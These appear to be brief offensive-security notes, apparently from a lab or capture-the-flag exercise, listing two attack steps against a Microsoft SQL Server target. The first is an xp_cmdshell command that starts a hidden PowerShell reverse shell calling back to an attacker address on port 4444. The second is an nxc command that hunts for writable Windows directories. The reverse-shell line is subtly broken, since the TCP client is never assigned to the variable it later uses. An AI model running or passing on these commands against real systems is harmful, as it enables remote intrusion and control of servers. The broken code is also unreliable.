1. Get rce if nc fails


EXEC xp_cmdshell "powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient('10.10.14.24',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"



2. Gete writbale Directories

nxc mssql <victim-ip> -u <user> -p <pass> --localauth -x "powershell -Command \"'C:\Users\Public','C:\ProgramData','C:\Temp','C:\Windows\Temp' | % { if (Test-Path $_ -and (Get-Acl $_).AccessToString -match 'Write') { Write-Output \\\"$_ is writable\\\" } }\""
